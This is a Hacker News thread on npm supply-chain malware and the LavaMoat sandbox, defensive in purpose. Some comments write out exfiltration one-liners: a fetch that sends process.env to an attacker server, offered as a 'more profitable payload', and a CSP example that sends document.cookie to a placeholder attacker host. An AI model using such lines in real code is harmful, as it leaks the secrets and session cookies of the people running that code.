
You too can run malware from NPM (I mean without consequences)

https://github.com/naugtur/running-qix-malware
195•naugtur•5mo ago

Comments

cluckindan•5mo ago
LavaMoat looks great on paper, but not supporting Webpack HMR is a dealbreaker.
naugtur•5mo ago
You're using HMR in your app's production bundle? How?
naugtur•5mo ago
If you mean during development - you can opt out of using LavaMoat in development for your webpack bundle (I'm assuming you're not running your untested code on valuable data).
cluckindan•5mo ago
Well, that’s not exactly reassuring. Having a very different runtime environment in production is a recipe for hard-to-debug issues.

Is it possible to generate the allowlist at development time without having the webpack plugin loaded? If it’s only generated at build time, it won’t protect against malicious packages getting installed in CI just before the build happens.

naugtur•5mo ago
You need to juggle two builds - one while you're iterating rapidly and another when you're near the start and finish of the increment. Not a lot of work compared to auditing a thousand packages.

Try it and see. There are tradeoffs, but if you roll it out, it is very powerful.

mohsen1•5mo ago
npm should take responsibility and up their game here. It’s possible to analyze the code and mark it as suspicious and delay the publish for stuff like this. It should prevent publishing code like this even if I have a gun to my head
sesm•5mo ago
I think malware check should be opt-in for package authors, but provide some kind of 'verified' badge to the package.

Edit: typo

naugtur•5mo ago
npm is on life support by msft. But there's socket.dev that can tell you if a package is malicious within hours of it being published.
shreddit•5mo ago
“within hours” is at least one hour too late, and most likely multiple hours.
naugtur•5mo ago
Absolutely not. You get npm packages by pulling them, not by them being pushed to you as soon as a new version exists. The likelihood of you updating instantly is close to zero, and if it isn't, you should set your stuff up so that it is. There are many ways to do that. Even better if compared to a month or two - which is how long it often takes for a researcher to find carefully planted malware.

Anyway, the case where reactive tools (detections, warnings) don't catch it is why LavaMoat exists. It prevents whole classes of malware from working at runtime. The article (and repo) demonstrates that.

rs186•5mo ago
Sure, it should never happen in CI environment. But I bet that every second, someone in the world is running "npm install" to bring in a new dependency to a new/existing project, and the impact of a malicious release can be broad very quickly. Vibe coding is not going to slow this down.
naugtur•5mo ago
Vibe coding brings up the need for even more granular isolation. I'm on it ;)

LavaMoat Webpack Plugin will soon have the ability to treat parts of your app the same as it currently treats packages - with isolation and a policy limiting what they can do.

bavarianbob•5mo ago
I've worked in software supply chain security for two years now and this is an extremely optimistic take. Nearly all organizations are not even remotely close to this level of responsiveness.
naugtur•4mo ago
Again, that's why LavaMoat exists. Set it up once and it will block many classes of attacks regardless of where they come from.
Cthulhu_•5mo ago
Depends on whether they hold publishing to the main audience until said scan has finished.
Cthulhu_•5mo ago
I always thought this would be the ideal monetization path for NPM; enterprises pay them, NPM only supplies verified package releases, ideally delayed by hours/days after release so that anything that slips through the cracks has a chance to get caught.
chrisweekly•5mo ago
Enterprises today typically use a custom registry, which can include any desired amount of scans and rigorous controls.
johannes1234321•5mo ago
That would either expose them to liability or be a fairly worthless agreement that takes no responsibility.
yjftsjthsd-h•5mo ago
> but provide some kind of 'verified' badge to the package

I would worry that that results in a false sense of security. Even if the actual badge says "passes some heuristics that catch only the most obvious malicious code", many people will read "totally 100% safe, please use with reckless abandon".

madeofpalk•5mo ago
They already have this

https://docs.npmjs.com/trusted-publishers

https://docs.npmjs.com/generating-provenance-statements

untitaker_•5mo ago
I can guarantee you npm will externalize the cost of false-positive malware scans to package authors.
nodesocket•5mo ago
Or at a minimum support yubikey for 2fa.
worthless-trash•5mo ago
Original author could be evil. 2fa does nothing.
jamesnorden•5mo ago
If my grandma had wheels she'd be a bike. You don't need to attack the problem from only one angle.
worthless-trash•5mo ago
Your grandma is a bike then. The 2fa is going to solve nothing and any attacker worth their salt knows it.
singulasar•5mo ago
unphishable 2fa would have prevented this specific case tho... what are you talking about?
mcintyre1994•5mo ago
They do, I use a yubikey and it requires me to authenticate with it whenever I publish. They do support weaker 2fa methods as well, but you can choose.
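
For reference, a rough sketch of how this gets switched on with the npm CLI (to the best of my recollection of the docs - check `npm help profile` for the current syntax):

```sh
# Require a second factor both for login and for publish/unpublish ("auth-and-writes")
npm profile enable-2fa auth-and-writes

# When publishing without a security key, npm prompts for the OTP,
# or it can be passed explicitly:
npm publish --otp=123456
```
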
azemetre•5mo ago
Why would npm care? They're basically a monopoly in the JS world and under the stewardship of a company that doesn't even care when its host nation gets hacked when using their software due to their ineptitude.
clbrmbr•5mo ago
How much money have the attackers stolen so far? Has someone done an analysis of the blockchains for the destination addresses?
naugtur•5mo ago
Click through to the article - it has a link to a view that lists the laughable profit.
clbrmbr•5mo ago
Huh. I read TFA in detail (and shared with my team), but I didn’t see any analysis. (?)
crtasm•5mo ago
I think they mean the link to https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...
hiccuphippo•5mo ago
It seems to be this: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

500 USD, not bad for a month of work if the author is from a 3rd world country.

naugtur•5mo ago
There's only one transaction that's making up most of it. Someone lost some serious 0.1 ETH or so.

$500 is nothing. It's what unsophisticated phishing makes in a day. It's what a support-call scammer makes for their owner in a day.

This was an attack on legitimate npm packages that end up on maybe hundreds of thousands of developer machines building tens of thousands of applications.

`fetch(myserverurl+JSON.stringify(process.env))` would be orders of magnitude more profitable as a payload.

javcasas•5mo ago
3rd world country developers routinely earn more than that.

A shitty junior developer in Ecuador easily pulls $700-800 per month. If they are at all competent, they can double that at an outsourcing consultancy.

Cthulhu_•5mo ago
"3rd world country" is an outdated cold war phrase usually incorrectly used to describe wealth or development status (it originally meant "anything not NATO or Warsaw Pact"); China is a third world country by that merit, but it's the second richest country (by GDP) in the world.

"Developing" or "poor" country may be a more accurate phrase.

wodenokoto•5mo ago
> I won't go into this either, but you can take a look at the summary of "donations" some other friends linked to here: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

>Pretty low impact for an attack this big. Some of it seems to be people mocking the malware author with worthless transfers.

I believe this is the section. As far as I understand the link, it's about $500. I don't understand how you can tell whether a donation is a worthless mockery donation.

naugtur•5mo ago
I work with people who understand this stuff :D But if I see a transaction for thousands or millions of a coin I've never heard of with a $ value of about 1, it's likely a shitcoin and I'm guessing - mockery.
nodesocket•5mo ago
I'm actually shocked they have not stolen more, given the breach's impact radius. Perhaps we can thank wallets and exchanges for blacklisting the addresses and showing huge warnings like the one shown in the article.
shreddit•5mo ago
It was discovered pretty quickly; I don’t think most “big” projects update their packages within minutes of publication.
pixl97•5mo ago
Really I'd say the key here is timing. I didn't look into what time the NPM packages were updated, but there are a few key times depending on what markets you're targeting. If it were Indian devs it would be around 2AM CST and if it's US devs it would be around 10AM CST.

This is when I see the ramp up in queuing in CI/CD builds that lasts a few hours across companies and is more likely to trigger a package getting rebuilt.

zachrip•5mo ago
It was also packages that in my experience don't often find themselves on the frontend.
naugtur•5mo ago
- the attack it shipped was not a great fit for the packages compromised. `fetch(myserverurl+JSON.stringify(process.env))` would be a much more profitable payload
- naive obfuscation makes lights go red in so many places it'd be better to not obfuscate at all
- the addresses were marked as malicious by Blockaid sooner than the package could reach production in most apps. Most wallets were ready to warn users early enough.
p2detar•5mo ago
I’ve been out of the loop with npm for a while, but are there still no package namespaces?
uallo•5mo ago
https://docs.npmjs.com/about-scopes
diggan•5mo ago
Namespaces have existed since ~2016 at least in npm, but since it's not enforced and people want "nice looking" package names, the ecosystem still hasn't fully embraced it. It seems like more and more projects are using them (probably because all "good" names are already taken), but probably way less than half of all popular packages are scoped/namespaced.
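
For illustration, a scoped (namespaced) name just adds an @org/ prefix that is tied to an npm user or organization account (package names below are examples):

```sh
# Unscoped: lives in the global namespace, anyone could have claimed the name
npm install left-pad

# Scoped: the @myorg/ prefix is reserved for that account
npm install @myorg/left-pad

# Scoped packages default to restricted visibility on first publish
npm publish --access public
```
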
keysdev•5mo ago
Well there is jsr now....
stby•5mo ago
I am also out of the loop here, how would namespaces have helped?
clbrmbr•5mo ago
Is it typical in the JS space to include dependencies without versioning?

Also, curious: does freezing a version really provide much protection? Shouldn’t a commit hash be used? (Attacker can change a tag.)

naugtur•5mo ago
Packages published to npm are immutable. If you pin a version, you get the exact same version as long as MSFT servers are not compromised.

Installing from git is not recommended and has more issues than you might think https://dev.to/naugtur/a-phish-on-a-fork-no-chips-52cc

You are supposed to update packages, even if you use lockfiles (very common) or tools that pin your direct dependencies (renovate etc., not so common). And when you do update, will you read the package and all of its updated dependencies?

It's a hard problem with a bunch of tradeoffs.

Can be done, with enough attention and tools. Tools include LavaMoat :)
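
A minimal sketch of the pinning workflow described here, using standard npm flags (the package and version are just examples):

```sh
# Record an exact version in package.json instead of a ^range
npm install --save-exact chalk@5.3.0

# Or make exact saves the default for this project
echo "save-exact=true" >> .npmrc
```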

clbrmbr•5mo ago
Re: updates: I was just thinking of waiting a few weeks on the updates to allow compromised packages to be discovered.
naugtur•5mo ago
socket.dev will find most malware within hours of it being published.

With LavaMoat, most malware won't work even if you don't detect it.

whilenot-dev•5mo ago
> packages published to npm are immutable.

It depends on how you refer to them... tags ("@latest", "@next", etc.) are not immutable, and it's best to rely on the checksums in the lock file.

vel0city•5mo ago
The package-lock.json includes a hash of the package, not just a version number, so the resolved content should be immutable.
whilenot-dev•5mo ago
To add to this: the hash in the lock file is the checksum of the published tarball, not the commit hash.
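
For context, this is roughly what such an entry looks like in a v3 package-lock.json - the version is an example and the integrity value is a placeholder, not a real checksum:

```json
{
  "node_modules/chalk": {
    "version": "5.3.0",
    "resolved": "https://registry.npmjs.org/chalk/-/chalk-5.3.0.tgz",
    "integrity": "sha512-<base64 checksum of the published tarball>"
  }
}
```
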
cluckindan•5mo ago
And then someone runs `npm install` on their CI
herpdyderp•5mo ago
I’m intrigued but is that compartmentalization not incredibly expensive?
naugtur•5mo ago
It's within the same process and realm (window). It has a cost, but it's nothing compared to putting every dependency of a large app in a separate iframe/process and figuring out a way for them to communicate.
cluckindan•5mo ago
Have you tried to find ways to break it?

Plenty of objects in the browser API contain references to things that could be used to defeat the compartmentalization.

If one were to enumerate all properties on window and document, how many would be objects with a reference back to window, document or some API not on the allowed list?

cowbertvonmoo•5mo ago
I maintain ses, the compartment primitive LavaMoat relies on. The ses shim for hardenedjs.org creates compartments that deny guest code the ability to inspect the true global object or lexically reference any of its properties. By default, each compartment only sees the transitively frozen intrinsics like Array and Object, and no way to reach the genuine evaluators. The compartment traps the module loader as well, so you can only import modules that are explicitly injected. That leaves a lot of room for the platform to make mistakes and endow the compartment with gadgets, but also gives us a place to stand to mount a defense that is not otherwise prohibitively expensive.
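
A minimal sketch of that model using the ses shim, as I understand the API from hardenedjs.org (treat the details as approximate):

```js
// npm install ses
import 'ses';

// Freeze the shared intrinsics (Array, Object, Function, ...) so guest code
// can't monkey-patch anything other compartments rely on.
lockdown();

// The compartment only sees the globals we explicitly endow it with.
const guest = new Compartment({ log: harden(console.log) });

// Guest code has no path back to the host's globalThis, fetch, process, etc.
guest.evaluate(`log(typeof fetch)`);                      // "undefined"
guest.evaluate(`log(Object.isFrozen(Array.prototype))`);  // true
```
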
CyberMacGyver•5mo ago
Looks like OP is one of the contributors to LavaMoat
naugtur•5mo ago
Yes, I am. I came up with the first successful attempt at integrating the Principle of Least Authority software in LavaMoat with Webpack and wrote the LavaMoat Webpack Plugin.

Also, together with a bunch of great folks at TC39 we're trying to get enough building blocks for the same-realm isolation primitives into the language.

see hardenedjs.org too

I'm doing the rounds promoting the project today because at this point all we need to eliminate certain types of malware is to get LavaMoat a lot more adoption in the ecosystem.

( and that'll give me bug reports and maybe even contributions? :) )

hn92726819•5mo ago
I think most people are fine with promoting a cool project you work on, but it's best practice to disclose that in the article. Even something like "If your project was set up with LavaMoat (a project I've been working on), ..." would be enough.

I think that's why they made the comment.

naugtur•5mo ago
Yup, and thanks - I should have made the comment myself but got distracted.
EasyMark•5mo ago
You're forgiven. Thanks to you (and any other contribs) for the excellent project
btown•5mo ago
I'm often curious about how effective runtime quasi-sandboxing is in practice (at least until support at the TC39 level lands).

My understanding is that if you can run with a CSP that prevents unsafe-eval, and you lock a utility package down to not be able to access the `window` object, you can prevent it from messing with, say, window.fetch.

But what about a package that does assume the existence of window or globalThis? Say, a great many packages bridging non-React components into the React ecosystem. Once a package needs even read-only access to `window`, how do you protect against supply-chain attacks on that package? Even if you read-only proxy that object, for instance, can you ensure that nothing in `window` itself holds a reference to the non-proxied `window`?

Don't get me wrong - this project is tremendously useful as defense-in-depth. But curious about how much of a barrier it creates in practice against a determined attacker.

naugtur•5mo ago
It's based on HardenedJS.org

The sandbox itself is tight, there's a bug bounty even.

The same technology is behind metamask snaps - plugins in a browser extension.

And Moddable has their own implementation

The biggest problem is endowing overly powerful capabilities.

We've got ambitious plans for isolating the DOM, but that already failed once before.

1oooqooq•5mo ago
So, to answer the actual question: if something expects too much browser/DOM access to work, it won't?
jefozabuss•5mo ago
Seems like people already forgot about Jia Tan.

By the way, why doesn't npm already have a system in place to flag sketchy releases where most of the code looks normal and there is newly added obfuscated code with hexadecimal variable names and array lookups for execution...

tom1337•5mo ago
It would also be great if a release had to be approved by the maintainer via a second factor or an e-mail verification. Once a release has been published to npm, you have an hour to verify it by clicking a link in an email and then entering another second factor (a separate OTP from the login one, a passkey, a Yubikey, whatever). That would also prevent publishing with lost access keys. If you do not verify the release within the first hour, it gets deleted and never published.
naugtur•5mo ago
That's why we never went with using keys in CI for publishing. Local machine publishing requires a 2fa.

Automated publishing should use something like PagerDuty to signal to a group of maintainers that a version is being published, and it requires an approval to go through. And any one of them can veto within 5 minutes.

But we don't have that, so gotta be careful and prepare for the worst (use LavaMoat for that)

Cthulhu_•5mo ago
Not through e-mail links though, that's what caused this in the first place. E-mail notification, sure, but they should also do a phishing training mail - make it legit, but if people press the link they need to be told that NPM will never send them an email with a link.
dist-epoch•5mo ago
> flag sketchy releases

Because the malware writers will keep tweaking the code until it passes that check, just like virus writers submit their viruses to VirusTotal until they are undetected.

galaxy_gas•5mo ago
It's typical that the virus writer will use their own service; there are criminal VirusTotal clones that run many AVs in VMs and return the results. Because VirusTotal shares all binaries, anything uploaded to VirusTotal will be detected shortly if it is not already.
47282847•4mo ago
Isn’t it still the case that when signatures are added, it sometimes turns out that the malware code was uploaded months before - or did that change?
mystifyingpoi•5mo ago
Detecting sketchy-looking hex codes should be pretty straightforward, but then I imagine there are ways to make sketchy code non-sketchy, which would be immediately used. I can imagine a big JS function that pretends to do legit data manipulation but in the process creates the payload.
nicce•5mo ago
It is just about bringing classic non-signature-based antivirus software to the release cycle. Hard to say how useful it is, but it usually turns into an endless cat-and-mouse game, like with everything else.
hombre_fatal•5mo ago
Yeah, it’s merely a fluke that the malware author used some crappy online obfuscator that created those hex-code variables. It would have been less work and less suspicious if they had just kept their original semantic variable names like “originalFetch”.
Cthulhu_•5mo ago
It wouldn't be just one signal, but several - like a mere patch version that adds several kilobytes of code, long lines, etc. Or a release after a long silent period.
cluckindan•5mo ago
A complexity per line check would have flagged it.

Even a max line length check would have flagged it.
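
As a rough illustration of that kind of heuristic (not an existing npm feature - just a sketch, with an arbitrary threshold):

```js
import { readFileSync } from 'node:fs';

const MAX_LINE_LENGTH = 500; // arbitrary; legitimately minified code would need an exemption

// Return line numbers whose length exceeds the threshold - a crude proxy for
// "someone pasted an obfuscated blob into an otherwise readable file".
export function flagLongLines(path) {
  return readFileSync(path, 'utf8')
    .split('\n')
    .map((line, i) => ({ line: i + 1, length: line.length }))
    .filter(({ length }) => length > MAX_LINE_LENGTH);
}
```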

chatmasta•5mo ago
That would flag a huge percentage of JS packages that ship with minified code.
jay_kyburz•5mo ago
How are people verifying their dependencies if they are minified?
SethTro•5mo ago
That's the magic part, they aren't
chatmasta•5mo ago
My guy… in the JS ecosystem a “lock file” is something that restricts your package installer to an arbitrary range of packages, i.e. no restrictions at all and completely unpredictable. You have to go out of your way to “pin” a package to a specific version.
Izkata•5mo ago
Lockfiles use exact hashes, not versions/version ranges. Javascript projects use two files, a package file with version ranges (used when upgrading) and a lockfile with the exact version (used in general when installing in an existing project).
zdragnar•5mo ago
NPM is rather infamous for not exactly respecting the lockfile, however.
chatmasta•5mo ago
Sure, but a lockfile with a hash doesn’t mean that next time it will fail if it tries to install a version of the package without that hash. If your package.json specifies a semver range then it’ll pull the latest minor or patch version (which is what happened in this case with e.g. duckdb@1.3.3) and ignore any hash differences if the version has changed. Hence why I say you need to go out of your way to specify an exact version in package.json and then the lock file will work as you might expect a “lock” file to work. (Back when I was an engineer and not a PM with deteriorating coding ability, I had to make a yarn plugin to pin each of our dependencies.)

The best way to manage JS dependencies is to pin them to exact versions and rely on renovate bot to update them. Then at least it’s your choice when your code changes. Ideally you can rebuild your project in a decade from now. But if that’s not possible then at least you should have a choice to accept or decline code changes in your dependencies. This is very hard to achieve by default in the JS ecosystem.

jay_kyburz•5mo ago
I think at some point you would be better off vendoring them in.
chatmasta•5mo ago
That’s effectively what I did in a very roundabout way with docker images and caching that ended up abusing the GitLab free tier for image hosting. When you put it like that it does make me think there was a simpler solution, lol.

When I’m hacking on a C project and it’s got a bunch of code ripped out of another project, I’m like “heh, look at these primordial dependency management practices.” But five years later that thing is gonna compile no problem…

cluckindan•4mo ago
There’s even a command for that: npm pack
cluckindan•4mo ago
Why would you be including minified code in a build? That’s just bad practice and makes development-time debugging more difficult.
saghm•4mo ago
It's not like minified JS can't be parsed and processed as AST. You could still pretty easily split up each statement/assignment to check the length of each one individually.
cchance•5mo ago
Feels like a basic lightweight 3B AI model could easily spot shit like this on commit.
AtNightWeCode•5mo ago
The problem is that it is even possible to push builds from dev machines.
madeofpalk•5mo ago
With npm now supporting OIDC, you can just turn this off: https://docs.npmjs.com/trusted-publishers
hulitu•4mo ago
> By the way why doesn't npm have already a system in place to flag sketchy releases

Because nobody gives a fsck. Normally, after npm was filled with malware, people would avoid it. But it seems that nobody (distro maintainers) cares. People get what they asked for (malware).

j45•5mo ago
How does one avoid malware in npm specifically?

Makes me not want to use the ecosystem, which isn’t always possible.

beardyw•5mo ago
>Makes me not want to use the ecosystem

I came to that conclusion long ago.

pimterry•5mo ago
This attack is pretty bad, but as shown by the tiny ROI for the attacker mentioned in this article (about $500 so far: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...) this really isn't quite as ecosystem-catastrophic as it sounds, for a few reasons:

* Major attacks on large packages like this are caught fairly quickly - a few hours in this case - making the vulnerable window _relatively_ small.

* NPM locks installed dependencies by default, against both the version & a hash of the content, so you'll only install the new malicious version if you happen to be adding or updating this dependency specifically within the window this version is still live. It's effectively sort-of TOFU. Even if you ran `npm install` in a project already using this dependency during the specific window it was live, you would not normally install the malicious version.

* There's quite a few tools to help mitigate the risk here, like https://socket.dev and npq (https://github.com/lirantal/npq).

As one datapoint, look at the download stats for the affected Chalk package for example (https://www.npmjs.com/package/chalk?activeTab=versions) - the vast majority of installs were not installing the latest version anyway.

There are caveats to this: e.g. you can use npm without a lockfile, in which case a fresh local install can pull down unexpected versions, or you could be manually updating/adding a different package which happens to depend on an affected package (which might trigger a lockfile update, which might then fetch the latest version of the subdependency) during the vulnerable window, or of course it's totally possible you might install the package for the first time at precisely the wrong moment, etc.

This is definitely bad, and could have been extremely disastrous if it wasn't caught. But in practice, npm & the ecosystem have put in quite a few protections that do help to _mostly_ mitigate these kind of risks in typical use cases (but not completely, and there's definitely plenty more work to do!) and it's certainly not the case that millions of JS developers & projects were all catastrophically pwned today.
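
One practical corollary of the lockfile behaviour described above, using standard npm commands (the package name is just an example):

```sh
# CI: install exactly what the lockfile records; fails if package.json and the lockfile disagree
npm ci

# Before accepting an update, see what would actually change
npm outdated
npm install chalk@latest --dry-run
```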

naugtur•5mo ago
Very good summary.

Most other ecosystems are as vulnerable, if not more so; they just lack the scale.

OP, the malware is coming to the ecosystem you prefer. Give it time.

mapmeld•5mo ago
'npm install' and 'pip install' can both run scripts on your computer. Both ecosystems have this risk and loose monitoring, so there are days where packages are messed up. I don't think you can avoid malware by picking one over the other.
AtNightWeCode•5mo ago
I think JS should be all source and no packages at all.
phil294•5mo ago
What about complex SPAs? Database drivers? Polyfills? TypeScript?
AtNightWeCode•4mo ago
Pulling the source and compiling the package instead of pulling the package. Not much difference. Maybe slower build times but more secure and better builds.
riazrizvi•5mo ago
Glad to see this article raising awareness.

Without fairness in the marketplace, the talent loses the will to play and the economy will further deteriorate. We are all suffering from an international trust breakdown from Covid, and now also from AI spam. If we don’t turn this tide, jobs and business opportunities are going to keep shrinking.

erpderp•5mo ago
In the example snippets from OP, the code shown is in the browser. I'm failing to see how the interception, as described, couldn't be handled by a decent Content Security Policy - instead of requiring yet another npm package. Seems safer than installing another package to address risk from ... installing packages.
ghrl•5mo ago
I suppose if you're using a bundler, you will ship JS bundles including the malicious packages from your own trusted domain. How could CSP prevent this or similar attacks?
erpderp•5mo ago
According to the OP, in this specific case, the malware was mostly just intercepting legitimate fetch(), etc. calls. With CSP `connect-src`, I don't think that would be possible unless the new fetch targets are themselves on allow-listed domains (which is a totally separate issue).

For example, consider a CSP of `Content-Security-Policy: connect-src 'self' https://api.example.com;`: this policy would allow fetch() requests only to the same origin ('self') and to https://api.example.com, blocking any attempts to connect to other domains (typically with a corresponding warning/error in the browser dev console).

That said, in fairness, CSP is of course only applicable to frontend code (not to backend JS, where anecdotally I've seen a lot more usage of `chalk` and some of the other pwned packages), but frontend code and the `window` object is what the OP used in their examples and seems to be what they're targeting with webpack, hence my mentioning CSP.
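
To make that concrete, a sketch of what happens under such a policy if compromised frontend code tries to phone home (the attacker URL is made up, and this assumes the page actually serves the header above):

```js
// With `connect-src 'self' https://api.example.com`, the browser blocks this
// request before it leaves the page and reports a CSP violation.
fetch('https://attacker.invalid/collect?d=' + encodeURIComponent(document.cookie))
  .then(() => console.log('exfiltrated (should not happen under the CSP above)'))
  .catch(err => console.warn('blocked by CSP:', err)); // rejects with a TypeError
```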

4ndrewl•5mo ago
If you're not vendoring, there's an argument to say that some portion of your source code is fair game to anyone who has commit rights to a variety of repos.
withinrafael•5mo ago
In July, packages were loading malicious DLLs (on Windows targets) [1]. It doesn't appear LavaMoat would help in that scenario. Is that right? If so, how do you mitigate this? Run everything in a container?

[1] https://www.crowdstrike.com/en-us/blog/crowdstrike-falcon-pr...

mike-cardwell•5mo ago
https://gitlab.com/grepular/safernode
withinrafael•4mo ago
Thanks will check it out!
naugtur•5mo ago
1. Control lifecycle scripts with @lavamoat/allow-scripts (see the config sketch after this list)

2. Do local dev with https://github.com/lavamoat/kipuka installed (I'm working on it)

3. If you don't permit the APIs used for loading DLLs, they won't load themselves, so runtime protections are valid too. But I recall the DLLs were loaded in a lifecycle script.
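
For point 1, the allow-scripts configuration lives in package.json and looks roughly like this - the package names are placeholders, and the exact shape should be checked against the @lavamoat/allow-scripts README:

```json
{
  "lavamoat": {
    "allowScripts": {
      "some-native-addon": true,
      "some-package-whose-postinstall-you-do-not-trust": false
    }
  }
}
```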

withinrafael•4mo ago
Thanks will check both out!